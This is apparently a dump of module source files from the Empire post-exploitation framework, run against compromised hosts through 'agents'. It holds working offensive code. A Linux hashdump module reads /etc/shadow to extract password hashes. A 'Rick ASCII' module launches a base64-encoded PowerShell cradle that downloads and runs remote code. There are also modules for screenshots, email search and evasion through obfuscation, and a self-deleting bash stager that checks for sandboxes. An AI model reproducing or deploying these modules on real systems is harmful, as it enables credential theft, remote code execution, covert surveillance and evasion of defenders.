62 |         # read in the common powerview.ps1 module source code
63 |         moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
64 | 
65 |         try:
66 |             f = open(moduleSource, 'r')
67 |         except:
68 |             print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
69 |             return ""
70 | 
71 |         moduleCode = f.read()
72 |         f.close()
73 | 
74 |         # get just the code needed for the specified function
75 |         script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)
76 | 
77 |         script += moduleName + " "
78 | 
79 |         for option,values in self.options.iteritems():
80 |             if option.lower() != "agent":
81 |                 if values['Value'] and values['Value'] != '':
82 |                     if values['Value'].lower() == "true":
83 |                         # if we're just adding a switch
84 |                         script += " -" + str(option)
85 |                     else:
86 |                         script += " -" + str(option) + " " + str(values['Value']) 
87 | 
88 |         script += ' | ft -wrap | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
89 |         if obfuscate:
90 |             script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
91 |         return script
92 | 


--------------------------------------------------------------------------------
/lib/modules/powershell/situational_awareness/network/powerview/get_session.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | class Module:
 4 | 
 5 |     def __init__(self, mainMenu, params=[]):
 6 | 
 7 |         self.info = {
 8 |             'Name': 'Get-NetSession',
 9 | 
10 |             'Author': ['@harmj0y'],
11 | 
12 |             'Description': ('Execute the NetSessionEnum Win32API call to query a given host for active sessions on the host. Part of PowerView.'),
13 | 
14 |             'Background' : True,
15 | 
16 |             'OutputExtension' : None,
17 |             
18 |             'NeedsAdmin' : False,
19 | 
20 |             'OpsecSafe' : True,
21 |             
22 |             'Language' : 'powershell',
23 | 
24 |             'MinLanguageVersion' : '2',
25 |             
26 |             'Comments': [
27 |                 'https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/'
28 |             ]
29 |         }
30 | 
31 |         # any options needed by the module, settable during runtime
32 |         self.options = {
33 |             # format:
34 |             #   value_name : {description, required, default_value}
35 |             'Agent' : {
36 |                 'Description'   :   'Agent to run module on.',
37 |                 'Required'      :   True,
38 |                 'Value'         :   ''
39 |             },
40 |             'ComputerName' : {
41 |                 'Description'   :   'The hostname or IP to query for local group users.',
42 |                 'Required'      :   False,
43 |                 'Value'         :   'localhost'
44 |             }
45 |         }
46 | 
47 |         # save off a copy of the mainMenu object to access external functionality
48 |         #   like listeners/agent handlers/etc.
49 |         self.mainMenu = mainMenu
50 |         
51 |         for param in params:
52 |             # parameter format is [Name, Value]
53 |             option, value = param
54 |             if option in self.options:
55 |                 self.options[option]['Value'] = value
56 | 
57 | 
58 |     def generate(self, obfuscate=False, obfuscationCommand=""):
59 | 
60 |         moduleName = self.info["Name"]
61 |         
62 |         # read in the common powerview.ps1 module source code
63 |         moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
64 | 
65 |         try:
66 |             f = open(moduleSource, 'r')
67 |         except:
68 |             print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
69 |             return ""
70 | 
71 |         moduleCode = f.read()
72 |         f.close()
73 | 
74 |         # get just the code needed for the specified function
75 |         script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)
76 | 
77 |         script += moduleName + " "
78 | 
79 |         for option,values in self.options.iteritems():
80 |             if option.lower() != "agent":
81 |                 if values['Value'] and values['Value'] != '':
82 |                     if values['Value'].lower() == "true":
83 |                         # if we're just adding a switch
84 |                         script += " -" + str(option)
85 |                     else:
86 |                         script += " -" + str(option) + " " + str(values['Value']) 
87 | 
88 |         script += ' | ft -wrap | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
89 |         if obfuscate:
90 |             script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
91 |         return script
92 | 


--------------------------------------------------------------------------------
/lib/modules/powershell/trollsploit/rick_ascii.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | class Module:
 4 | 
 5 |     def __init__(self, mainMenu, params=[]):
 6 | 
 7 |         self.info = {
 8 |             'Name': 'Invoke-RickASCII',
 9 | 
10 |             'Author': ['@lee_holmes', '@harmj0y'],
11 | 
12 |             'Description': ("Spawns a a new powershell.exe process that runs Lee Holmes' ASCII Rick Roll."),
13 | 
14 |             'Background' : False,
15 | 
16 |             'OutputExtension' : None,
17 |             
18 |             'NeedsAdmin' : False,
19 | 
20 |             'OpsecSafe' : False,
21 | 
22 |             'Language' : 'powershell',
23 | 
24 |             'MinLanguageVersion' : '2',
25 |             
26 |             'Comments': [
27 |                 "http://www.leeholmes.com/blog/2011/04/01/powershell-and-html5/"
28 |             ]
29 |         }
30 | 
31 |         # any options needed by the module, settable during runtime
32 |         self.options = {
33 |             # format:
34 |             #   value_name : {description, required, default_value}
35 |             'Agent' : {
36 |                 'Description'   :   'Agent to run module on.',
37 |                 'Required'      :   True,
38 |                 'Value'         :   ''
39 |             }
40 |         }
41 | 
42 |         # save off a copy of the mainMenu object to access external functionality
43 |         #   like listeners/agent handlers/etc.
44 |         self.mainMenu = mainMenu
45 | 
46 |         for param in params:
47 |             # parameter format is [Name, Value]
48 |             option, value = param
49 |             if option in self.options:
50 |                 self.options[option]['Value'] = value
51 | 
52 | 
53 |     def generate(self, obfuscate=False, obfuscationCommand=""):
54 |  
55 |         # iex (New-Object Net.WebClient).DownloadString("http://bit.ly/e0Mw9w")
56 |         script = "$Null = Start-Process -WindowStyle Maximized -FilePath \"C:\Windows\System32\WindowsPowerShell\\v1.0\powershell.exe\" -ArgumentList \"-enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYgBpAHQALgBsAHkALwBlADAATQB3ADkAdwAiACkA\"; 'Client Rick-Asciied!'"
57 |         if obfuscate:
58 |             script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
59 |         return script
60 | 


--------------------------------------------------------------------------------
/lib/modules/powershell/trollsploit/rick_astley.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | class Module:
 4 | 
 5 |     def __init__(self, mainMenu, params=[]):
 6 | 
 7 |         self.info = {
 8 |             'Name': 'Get-RickAstley',
 9 | 
10 |             'Author': ['@SadProcessor', '@harmj0y'],
11 | 
12 |             'Description': ("Runs @SadProcessor's beeping rickroll."),
13 | 
14 |             'Background' : True,
15 | 
16 |             'OutputExtension' : None,
17 |             
18 |             'NeedsAdmin' : False,
19 | 
20 |             'OpsecSafe' : False,
21 | 
22 |             'Language' : 'powershell',
23 | 
24 |             'MinLanguageVersion' : '2',
25 |             
26 |             'Comments': [
27 |                 "https://gist.github.com/SadProcessor/3e413f9542b01ee90979"
28 |             ]
29 |         }
30 | 
31 |         # any options needed by the module, settable during runtime
32 |         self.options = {
33 |             # format:
34 |             #   value_name : {description, required, default_value}
35 |             'Agent' : {
36 |                 'Description'   :   'Agent to run module on.',
37 |                 'Required'      :   True,
38 |                 'Value'         :   ''
39 |             }
40 |         }
41 | 
42 |         # save off a copy of the mainMenu object to access external functionality
43 |         #   like listeners/agent handlers/etc.
44 |         self.mainMenu = mainMenu
45 | 
46 |         for param in params:
47 |             # parameter format is [Name, Value]
48 |             option, value = param
49 |             if option in self.options:
50 |                 self.options[option]['Value'] = value
51 | 
52 | 
53 |     def generate(self, obfuscate=False, obfuscationCommand=""):
54 |  
55 |         moduleName = self.info["Name"]
56 |         
57 |         # read in the common powerup.ps1 module source code
58 |         moduleSource = self.mainMenu.installPath + "/data/module_source/trollsploit/Get-RickAstley.ps1"
59 |         if obfuscate:
60 |             helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
61 |             moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
62 |         try:
63 |             f = open(moduleSource, 'r')
64 |         except:
65 |             print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
66 |             return ""
67 | 
68 |         script = f.read()
69 |         f.close()
70 | 
71 |         scriptEnd = moduleName + " "
72 | 
73 |         scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
74 |         if obfuscate:
75 |             scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
76 |         script += scriptEnd
77 |         return script
78 | 


--------------------------------------------------------------------------------
/lib/modules/powershell/trollsploit/voicetroll.py:
--------------------------------------------------------------------------------
 1 | import base64
 2 | from lib.common import helpers
 3 | 
 4 | class Module:
 5 | 
 6 |     def __init__(self, mainMenu, params=[]):
 7 | 
 8 |         self.info = {
 9 |             'Name': 'Invoke-VoiceTroll',
10 | 
11 |             'Author': ['@424f424f'],
12 | 
13 |             'Description': ("Reads text aloud via synthesized voice on target."),
14 | 
15 |             'Background' : True,
16 | 
17 |             'OutputExtension' : None,
18 |             
19 |             'NeedsAdmin' : False,
20 | 
21 |             'OpsecSafe' : False,
22 | 
23 |             'Language' : 'powershell',
24 | 
25 |             'MinLanguageVersion' : '2',
26 |             
27 |             'Comments': [
28 |                 'http://www.instructables.com/id/Make-your-computer-talk-with-powershell/'
29 |             ]
30 |         }
31 | 
32 |         # any options needed by the module, settable during runtime
33 |         self.options = {
34 |             # format:
35 |             #   value_name : {description, required, default_value}
36 |             'Agent' : {
37 |                 'Description'   :   'Agent to run module on.',
38 |                 'Required'      :   True,
39 |                 'Value'         :   ''
40 |             },
41 |             'VoiceText' : {
42 |                 'Description'   :   'Text to synthesize on target.',
43 |                 'Required'      :   True,
44 |                 'Value'         :   ''
45 |             }
46 |         }
47 | 
48 |         # save off a copy of the mainMenu object to access external functionality
49 |         #   like listeners/agent handlers/etc.
50 |         self.mainMenu = mainMenu
51 | 
52 |         for param in params:
53 |             # parameter format is [Name, Value]
54 |             option, value = param
55 |             if option in self.options:
56 |                 self.options[option]['Value'] = value
57 | 
58 | 
59 |     def generate(self, obfuscate=False, obfuscationCommand=""):
60 |         
61 |         script = """
62 | Function Invoke-VoiceTroll
63 | 
64 | {
65 |     [CmdletBinding()]
66 |     Param (
67 |         [Parameter(Mandatory = $True, Position = 0)]
68 |         [ValidateNotNullOrEmpty()]
69 |         [String] $VoiceText
70 |     )
71 | 
72 |     Set-StrictMode -version 2
73 |     Add-Type -AssemblyName System.Speech
74 |     $synth = New-Object -TypeName System.Speech.Synthesis.SpeechSynthesizer
75 |     $synth.Speak($VoiceText)
76 | }
77 | Invoke-VoiceTroll"""
78 | 
79 |         for option,values in self.options.iteritems():
80 |             if option.lower() != "agent" and option.lower() != "computername":
81 |                 if values['Value'] and values['Value'] != '':
82 |                     if values['Value'].lower() == "true":
83 |                         # if we're just adding a switch
84 |                         script += " -" + str(option)
85 |                     else:
86 |                         script += " -" + str(option) + " \"" + str(values['Value'].strip("\"")) + "\""
87 |         if obfuscate:
88 |             script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
89 |         return script
90 | 


--------------------------------------------------------------------------------
/lib/modules/python/collection/linux/hashdump.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | import pdb
 3 | 
 4 | class Module:
 5 | 
 6 |     def __init__(self, mainMenu, params=[]):
 7 | 
 8 |         # metadata info about the module, not modified during runtime
 9 |         self.info = {
10 |             # name for the module that will appear in module menus
11 |             'Name': 'Linux Hashdump',
12 | 
13 |             # list of one or more authors for the module
14 |             'Author': ['@harmj0y'],
15 | 
16 |             # more verbose multi-line description of the module
17 |             'Description': ("Extracts the /etc/passwd and /etc/shadow, unshadowing the result."),
18 | 
19 |             # True if the module needs to run in the background
20 |             'Background' : False,
21 | 
22 |             # File extension to save the file as
23 |             'OutputExtension' : "",
24 | 
25 |             # if the module needs administrative privileges
26 |             'NeedsAdmin' : True,
27 | 
28 |             # True if the method doesn't touch disk/is reasonably opsec safe
29 |             'OpsecSafe' : True,
30 | 
31 |             # the module language
32 |             'Language' : 'python',
33 | 
34 |             # the minimum language version needed
35 |             'MinLanguageVersion' : '2.6',
36 | 
37 |             # list of any references/other comments
38 |             'Comments': []
39 |         }
40 | 
41 |         # any options needed by the module, settable during runtime
42 |         self.options = {
43 |             # format:
44 |             #   value_name : {description, required, default_value}
45 |             'Agent' : {
46 |                 # The 'Agent' option is the only one that MUST be in a module
47 |                 'Description'   :   'Agent to execute module on.',
48 |                 'Required'      :   True,
49 |                 'Value'         :   ''
50 |             }
51 |         }
52 | 
53 |         # save off a copy of the mainMenu object to access external functionality
54 |         #   like listeners/agent handlers/etc.
55 |         self.mainMenu = mainMenu
56 | 
57 |         # During instantiation, any settable option parameters
58 |         #   are passed as an object set to the module and the
59 |         #   options dictionary is automatically set. This is mostly
60 |         #   in case options are passed on the command line
61 |         if params:
62 |             for param in params:
63 |                 # parameter format is [Name, Value]
64 |                 option, value = param
65 |                 if option in self.options:
66 |                     self.options[option]['Value'] = value
67 | 
68 |     def generate(self, obfuscate=False, obfuscationCommand=""):
69 | 
70 |         script = """
71 | f = open("/etc/passwd")
72 | passwd = f.readlines()
73 | f.close()
74 | 
75 | f2 = open("/etc/shadow")
76 | shadow = f2.readlines()
77 | f2.close()
78 | 
79 | users = {}
80 | 
81 | for line in shadow:
82 |     parts = line.strip().split(":")
83 |     username, pwdhash = parts[0], parts[1]
84 |     users[username] = pwdhash
85 | 
86 | for line in passwd:
87 |     parts = line.strip().split(":")
88 |     username = parts[0]
89 |     info = ":".join(parts[2:])
90 |     if username in users:
91 |         print "%s:%s:%s" %(username, users[username], info)
92 | """
93 | 
94 |         return script
95 | 


--------------------------------------------------------------------------------
/lib/modules/python/collection/osx/screenshot.py:
--------------------------------------------------------------------------------
 1 | class Module:
 2 | 
 3 |     def __init__(self, mainMenu, params=[]):
 4 | 
 5 |         # metadata info about the module, not modified during runtime
 6 |         self.info = {
 7 |             # name for the module that will appear in module menus
 8 |             'Name': 'Screenshot',
 9 | 
10 |             # list of one or more authors for the module
11 |             'Author': ['@harmj0y'],
12 | 
13 |             # more verbose multi-line description of the module
14 |             'Description': ('Takes a screenshot of an OSX desktop using screencapture and returns the data.'),
15 | 
16 |             # True if the module needs to run in the background
17 |             'Background': False,
18 | 
19 |             # File extension to save the file as
20 |             'OutputExtension': "png",
21 | 
22 |             # if the module needs administrative privileges
23 |             'NeedsAdmin': False,
24 | 
25 |             # True if the method doesn't touch disk/is reasonably opsec safe
26 |             'OpsecSafe': False,
27 | 
28 |             # the module language
29 |             'Language' : 'python',
30 | 
31 |             # the minimum language version needed
32 |             'MinLanguageVersion' : '2.6',
33 | 
34 |             # list of any references/other comments
35 |             'Comments': []
36 |         }
37 | 
38 |         # any options needed by the module, settable during runtime
39 |         self.options = {
40 |             # format:
41 |             #   value_name : {description, required, default_value}
42 |             'Agent': {
43 |                 # The 'Agent' option is the only one that MUST be in a module
44 |                 'Description'   :   'Agent to execute module on.',
45 |                 'Required'      :   True,
46 |                 'Value'         :   ''
47 |             },
48 |             'SavePath': {
49 |                 'Description'   :   'Path of the temporary screenshot file to save.',
50 |                 'Required'      :   True,
51 |                 'Value'         :   '/tmp/out.png'
52 |             }
53 |         }
54 | 
55 |         # save off a copy of the mainMenu object to access external functionality
56 |         #   like listeners/agent handlers/etc.
57 |         self.mainMenu = mainMenu
58 | 
59 |         # During instantiation, any settable option parameters
60 |         #   are passed as an object set to the module and the
61 |         #   options dictionary is automatically set. This is mostly
62 |         #   in case options are passed on the command line
63 |         if params:
64 |             for param in params:
65 |                 # parameter format is [Name, Value]
66 |                 option, value = param
67 |                 if option in self.options:
68 |                     self.options[option]['Value'] = value
69 | 
70 |     def generate(self, obfuscate=False, obfuscationCommand=""):
71 | 
72 |         savePath = self.options['SavePath']['Value']
73 | 
74 |         script = """
75 | # take a screenshot using screencapture
76 | run_command('screencapture -x %s')
77 | # base64 up resulting file, delete the file, return the base64 of the png output
78 | #   mocked from the Empire screenshot module
79 | f = open('%s', 'rb')
80 | data = f.read()
81 | f.close()
82 | run_command('rm -f %s')
83 | print data
84 | """ % (savePath, savePath, savePath)
85 | 
86 |         return script
87 | 


--------------------------------------------------------------------------------
/lib/modules/python/collection/osx/search_email.py:
--------------------------------------------------------------------------------
 1 | class Module:
 2 | 
 3 |     def __init__(self, mainMenu, params=[]):
 4 | 
 5 |         # metadata info about the module, not modified during runtime
 6 |         self.info = {
 7 |             # name for the module that will appear in module menus
 8 |             'Name': 'SearchEmail',
 9 | 
10 |             # list of one or more authors for the module
11 |             'Author': ['@harmj0y'],
12 | 
13 |             # more verbose multi-line description of the module
14 |             'Description': ("Searches for Mail .emlx messages, optionally only returning "
15 |                             "messages with the specified SeachTerm."),
16 | 
17 |             # True if the module needs to run in the background
18 |             'Background' : False,
19 | 
20 |             # File extension to save the file as
21 |             'OutputExtension' : "",
22 | 
23 |             # if the module needs administrative privileges
24 |             'NeedsAdmin' : False,
25 | 
26 |             # True if the method doesn't touch disk/is reasonably opsec safe
27 |             'OpsecSafe' : True,
28 | 
29 |             # the module language
30 |             'Language' : 'python',
31 | 
32 |             # the minimum language version needed
33 |             'MinLanguageVersion' : '2.6',
34 | 
35 |             # list of any references/other comments
36 |             'Comments': [
37 |                 "https://davidkoepi.wordpress.com/2013/07/06/macforensics5/"
38 |             ]
39 |         }
40 | 
41 |         # any options needed by the module, settable during runtime
42 |         self.options = {
43 |             # format:
44 |             #   value_name : {description, required, default_value}
45 |             'Agent' : {
46 |                 # The 'Agent' option is the only one that MUST be in a module
47 |                 'Description'   :   'Agent to execute module on.',
48 |                 'Required'      :   True,
49 |                 'Value'         :   ''
50 |             },
51 |             'SearchTerm' : {
52 |                 # The 'Agent' option is the only one that MUST be in a module
53 |                 'Description'   :   "Term to grep for in email messages.",
54 |                 'Required'      :   False,
55 |                 'Value'         :   ''
56 |             }
57 |         }
58 | 
59 |         # save off a copy of the mainMenu object to access external functionality
60 |         #   like listeners/agent handlers/etc.
61 |         self.mainMenu = mainMenu
62 | 
63 |         # During instantiation, any settable option parameters
64 |         #   are passed as an object set to the module and the
65 |         #   options dictionary is automatically set. This is mostly
66 |         #   in case options are passed on the command line
67 |         if params:
68 |             for param in params:
69 |                 # parameter format is [Name, Value]
70 |                 option, value = param
71 |                 if option in self.options:
72 |                     self.options[option]['Value'] = value
73 | 
74 |     def generate(self, obfuscate=False, obfuscationCommand=""):
75 | 
76 |         searchTerm = self.options['SearchTerm']['Value']
77 | 
78 |         script = "cmd = \"find /Users/ -name *.emlx 2>/dev/null"
79 | 
80 |         if searchTerm != "":
81 |             script += "|xargs grep -i '"+searchTerm+"'\""
82 |         else:
83 |             script += "\""
84 | 
85 |         script += "\nrun_command(cmd)"
86 | 
87 |         return script
88 | 


--------------------------------------------------------------------------------
/lib/modules/python/trollsploit/osx/say.py:
--------------------------------------------------------------------------------
 1 | class Module:
 2 | 
 3 |     def __init__(self, mainMenu, params=[]):
 4 | 
 5 |         # metadata info about the module, not modified during runtime
 6 |         self.info = {
 7 |             # name for the module that will appear in module menus
 8 |             'Name': 'Say',
 9 | 
10 |             # list of one or more authors for the module
11 |             'Author': ['@harmj0y'],
12 | 
13 |             # more verbose multi-line description of the module
14 |             'Description': ('Performs text to speech using "say".'),
15 | 
16 |             # True if the module needs to run in the background
17 |             'Background' : False,
18 | 
19 |             # File extension to save the file as
20 |             'OutputExtension' : '',
21 | 
22 |             # if the module needs administrative privileges
23 |             'NeedsAdmin' : False,
24 | 
25 |             # True if the method doesn't touch disk/is reasonably opsec safe
26 |             'OpsecSafe' : False,
27 | 
28 |             # the module language
29 |             'Language' : 'python',
30 | 
31 |             # the minimum language version needed
32 |             'MinLanguageVersion' : '2.6',
33 | 
34 |             # list of any references/other comments
35 |             'Comments': [ ]
36 |         }
37 | 
38 |         # any options needed by the module, settable during runtime
39 |         self.options = {
40 |             # format:
41 |             #   value_name : {description, required, default_value}
42 |             'Agent' : {
43 |                 # The 'Agent' option is the only one that MUST be in a module
44 |                 'Description'   :   'Agent to execute module on.',
45 |                 'Required'      :   True,
46 |                 'Value'         :   ''
47 |             },
48 |             'Text' : {
49 |                 'Description'   :   'The text to speak.',
50 |                 'Required'      :   True,
51 |                 'Value'         :   ''
52 |             },
53 |             'Voice' : {
54 |                 'Description'   :   'The voice to use.',
55 |                 'Required'      :   True,
56 |                 'Value'         :   'alex'
57 |             }
58 |         }
59 | 
60 |         # save off a copy of the mainMenu object to access external functionality
61 |         #   like listeners/agent handlers/etc.
62 |         self.mainMenu = mainMenu
63 | 
64 |         # During instantiation, any settable option parameters
65 |         #   are passed as an object set to the module and the
66 |         #   options dictionary is automatically set. This is mostly
67 |         #   in case options are passed on the command line
68 |         if params:
69 |             for param in params:
70 |                 # parameter format is [Name, Value]
71 |                 option, value = param
72 |                 if option in self.options:
73 |                     self.options[option]['Value'] = value
74 | 
75 |     def generate(self, obfuscate=False, obfuscationCommand=""):
76 | 
77 |         voice = self.options['Voice']['Value']
78 |         text = self.options['Text']['Value']
79 | 
80 |         script = """
81 | run_command('say -v %s %s')
82 | """ % (voice, text)
83 | 
84 |         return script
85 | 


--------------------------------------------------------------------------------
/lib/modules/python/trollsploit/osx/thunderstruck.py:
--------------------------------------------------------------------------------
 1 | class Module:
 2 | 
 3 |     def __init__(self, mainMenu, params=[]):
 4 | 
 5 |         # metadata info about the module, not modified during runtime
 6 |         self.info = {
 7 |             # name for the module that will appear in module menus
 8 |             'Name': 'Open Safari in the background and play Thunderstruck.',
 9 | 
10 |             # list of one or more authors for the module
11 |             'Author': ['@424f424f'],
12 | 
13 |             # more verbose multi-line description of the module
14 |             'Description': 'Open Safari in the background and play Thunderstruck.',
15 | 
16 |             # True if the module needs to run in the background
17 |             'Background' : False,
18 | 
19 |             # File extension to save the file as
20 |             'OutputExtension' : "",
21 | 
22 |             # if the module needs administrative privileges
23 |             'NeedsAdmin' : False,
24 | 
25 |             # True if the method doesn't touch disk/is reasonably opsec safe
26 |             'OpsecSafe' : False,
27 | 
28 |             # the module language
29 |             'Language' : 'python',
30 | 
31 |             # the minimum language version needed
32 |             'MinLanguageVersion' : '2.6',
33 | 
34 |             # list of any references/other comments
35 |             'Comments': ['']
36 |         }
37 | 
38 |         # any options needed by the module, settable during runtime
39 |         self.options = {
40 |             # format:
41 |             #   value_name : {description, required, default_value}
42 |             'Agent' : {
43 |                 # The 'Agent' option is the only one that MUST be in a module
44 |                 'Description'   :   'Agent to run on.',
45 |                 'Required'      :   True,
46 |                 'Value'         :   ''
47 |             }
48 |         }
49 | 
50 |         # save off a copy of the mainMenu object to access external functionality
51 |         #   like listeners/agent handlers/etc.
52 |         self.mainMenu = mainMenu
53 | 
54 |         # During instantiation, any settable option parameters
55 |         #   are passed as an object set to the module and the
56 |         #   options dictionary is automatically set. This is mostly
57 |         #   in case options are passed on the command line
58 |         if params:
59 |             for param in params:
60 |                 # parameter format is [Name, Value]
61 |                 option, value = param
62 |                 if option in self.options:
63 |                     self.options[option]['Value'] = value
64 | 
65 |     def generate(self, obfuscate=False, obfuscationCommand=""):
66 | 
67 |         # the Python script itself, with the command to invoke
68 |         #   for execution appended to the end. Scripts should output
69 |         #   everything to the pipeline for proper parsing.
70 |         #
71 |         # the script should be stripped of comments, with a link to any
72 |         #   original reference script included in the comments.
73 |         script = """
74 | import subprocess
75 | 
76 | try:
77 |     volume = \"""osascript -e "set Volume 100" ""\"
78 |     process1 = subprocess.Popen(volume, stdout=subprocess.PIPE, shell=True)
79 |     cmd = \"""open -a "Safari" -g -j https://www.youtube.com/watch?v=v2AC41dglnM""\"
80 |     process2 = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
81 |     print "Thunderstruck engaged!"
82 | 
83 | except Exception as e:
84 |     print "Module failed"
85 |     print e
86 | 
87 | """
88 |         return script
89 | 


--------------------------------------------------------------------------------
/lib/modules/python_jobs_template.py:
--------------------------------------------------------------------------------
 1 | class Module:
 2 | 
 3 |     def __init__(self, mainMenu, params=[]):
 4 | 
 5 |         # metadata info about the module, not modified during runtime
 6 |         self.info = {
 7 |             # name for the module that will appear in module menus
 8 |             'Name': 'Background Example',
 9 | 
10 |             # list of one or more authors for the module
11 |             'Author': ['@Killswitch-GUI'],
12 | 
13 |             # more verbose multi-line description of the module
14 |             'Description': ('A quick example how to feed your data to a background job.'),
15 | 
16 |             # True if the module needs to run in the background
17 |             'Background' : True,
18 | 
19 |             # File extension to save the file as
20 |             'OutputExtension' : '',
21 | 
22 |             # if the module needs administrative privileges
23 |             'NeedsAdmin' : False,
24 | 
25 |             # True if the method doesn't touch disk/is reasonably opsec safe
26 |             'OpsecSafe' : False,
27 | 
28 |             # the module language
29 |             'Language' : 'python',
30 | 
31 |             # the minimum language version needed
32 |             'MinLanguageVersion' : '2.6',
33 | 
34 |             # list of any references/other comments
35 |             'Comments': [ ]
36 |         }
37 | 
38 |         # any options needed by the module, settable during runtime
39 |         self.options = {
40 |             # format:
41 |             #   value_name : {description, required, default_value}
42 |             'Agent' : {
43 |                 # The 'Agent' option is the only one that MUST be in a module
44 |                 'Description'   :   'Agent to execute module on.',
45 |                 'Required'      :   True,
46 |                 'Value'         :   ''
47 |             }
48 |         }
49 | 
50 |         # save off a copy of the mainMenu object to access external functionality
51 |         #   like listeners/agent handlers/etc.
52 |         self.mainMenu = mainMenu
53 | 
54 |         # During instantiation, any settable option parameters
55 |         #   are passed as an object set to the module and the
56 |         #   options dictionary is automatically set. This is mostly
57 |         #   in case options are passed on the command line
58 |         if params:
59 |             for param in params:
60 |                 # parameter format is [Name, Value]
61 |                 option, value = param
62 |                 if option in self.options:
63 |                     self.options[option]['Value'] = value
64 | 
65 |     def generate(self):
66 | 
67 |         script = """
68 | x = 0
69 | while True:
70 |     import time
71 |     try:
72 |         time.sleep(2)
73 |         msg = 'NOW inside buffer at message: ' + str(x) + '\\n'
74 |         job_message_buffer(msg)
75 |         x += 1
76 |     except Exception as e:
77 |         print e
78 | """
79 |         return script
80 | 


--------------------------------------------------------------------------------
/lib/powershell/Invoke-Obfuscation/Invoke-Obfuscation.psd1:
--------------------------------------------------------------------------------
 1 | #   This file is part of Invoke-Obfuscation.
 2 | #
 3 | #   Copyright 2017 Daniel Bohannon <@danielhbohannon>
 4 | #         while at Mandiant <http://www.mandiant.com>
 5 | #
 6 | #   Licensed under the Apache License, Version 2.0 (the "License");
 7 | #   you may not use this file except in compliance with the License.
 8 | #   You may obtain a copy of the License at
 9 | #
10 | #       http://www.apache.org/licenses/LICENSE-2.0
11 | #
12 | #   Unless required by applicable law or agreed to in writing, software
13 | #   distributed under the License is distributed on an "AS IS" BASIS,
14 | #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
15 | #   See the License for the specific language governing permissions and
16 | #   limitations under the License.
17 | 
18 | 
19 | 
20 | #
21 | # Module manifest for module 'Invoke-Obfuscation'
22 | #
23 | # Generated by: Daniel Bohannon (@danielhbohannon)
24 | #
25 | # Generated on: 2017-01-19
26 | #
27 | 
28 | 
29 | 
30 | @{
31 | 
32 | # Version number of this module.
33 | ModuleVersion = '1.1'
34 | 
35 | # ID used to uniquely identify this module
36 | GUID = 'd0a9150d-b6a4-4b17-a325-e3a24fed0aa9'
37 | 
38 | # Author of this module
39 | Author = 'Daniel Bohannon (@danielhbohannon)'
40 | 
41 | # Copyright statement for this module
42 | Copyright = 'Apache License, Version 2.0'
43 | 
44 | # Description of the functionality provided by this module
45 | Description = 'PowerShell module file for importing all required modules for the Invoke-Obfuscation framework.'
46 | 
47 | # Minimum version of the Windows PowerShell engine required by this module
48 | PowerShellVersion = '2.0'
49 | 
50 | # Minimum version of the Windows PowerShell host required by this module
51 | PowerShellHostVersion = '2.0'
52 | 
53 | # Script files (.ps1) that are run in the caller's environment prior to importing this module
54 | ScriptsToProcess = @('Out-ObfuscatedTokenCommand.ps1','Out-ObfuscatedStringCommand.ps1','Out-EncodedAsciiCommand.ps1','Out-EncodedHexCommand.ps1','Out-EncodedOctalCommand.ps1','Out-EncodedBinaryCommand.ps1','Out-SecureStringCommand.ps1','Out-EncodedBXORCommand.ps1','Out-PowerShellLauncher.ps1','Invoke-Obfuscation.ps1')
55 | 
56 | # Functions to export from this module
57 | FunctionsToExport = '*'
58 | 
59 | # HelpInfo URI of this module
60 | # HelpInfoURI = ''
61 | 
62 | }


--------------------------------------------------------------------------------
/lib/stagers/multi/bash.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | 
 4 | class Stager:
 5 | 
 6 |     def __init__(self, mainMenu, params=[]):
 7 | 
 8 |         self.info = {
 9 |             'Name': 'BashScript',
10 | 
11 |             'Author': ['@harmj0y'],
12 | 
13 |             'Description': ('Generates self-deleting Bash script to execute the Empire stage0 launcher.'),
14 | 
15 |             'Comments': [
16 |                 ''
17 |             ]
18 |         }
19 | 
20 |         # any options needed by the stager, settable during runtime
21 |         self.options = {
22 |             # format:
23 |             #   value_name : {description, required, default_value}
24 |             'Listener' : {
25 |                 'Description'   :   'Listener to generate stager for.',
26 |                 'Required'      :   True,
27 |                 'Value'         :   ''
28 |             },
29 |             'Language' : {
30 |                 'Description'   :   'Language of the stager to generate.',
31 |                 'Required'      :   True,
32 |                 'Value'         :   'python'
33 |             },
34 |             'OutFile' : {
35 |                 'Description'   :   'File to output Bash script to, otherwise displayed on the screen.',
36 |                 'Required'      :   False,
37 |                 'Value'         :   ''
38 |             },
39 |             'SafeChecks' : {
40 |                 'Description'   :   'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.',
